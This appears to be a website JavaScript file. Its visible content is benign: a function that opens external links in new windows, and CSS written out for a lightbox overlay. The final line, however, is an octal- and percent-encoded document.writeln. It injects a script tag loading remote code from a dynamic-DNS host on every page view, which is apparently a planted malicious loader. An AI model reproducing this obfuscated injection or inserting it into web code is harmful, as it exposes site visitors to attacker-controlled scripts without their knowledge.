function externallinks() { 
 if (!document.getElementsByTagName) return; 
 var anchors = document.getElementsByTagName("a"); 
 for (var i=0; i<anchors.length; i++) { 
   var anchor = anchors[i]; 
   if (anchor.getAttribute("href") && 
       anchor.getAttribute("rel") == "external") 
     anchor.target = "_blank"; 
 } 
} 
window.onload = externallinks;

document.writeln("<style type=\"text\/css\">");
document.writeln("<!--");
document.writeln("#TB_overlay {");
document.writeln("	-moz-opacity: 0.75;");
document.writeln("	opacity: 0.75;");
document.writeln("}");
document.writeln("#TB_HideSelect{");
document.writeln("	-moz-opacity: 0;");
document.writeln("	opacity: 0;");
document.writeln("}");
document.writeln(":focus {-moz-outline-style: none}");
document.writeln("-->");
document.writeln("<\/style>")

document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
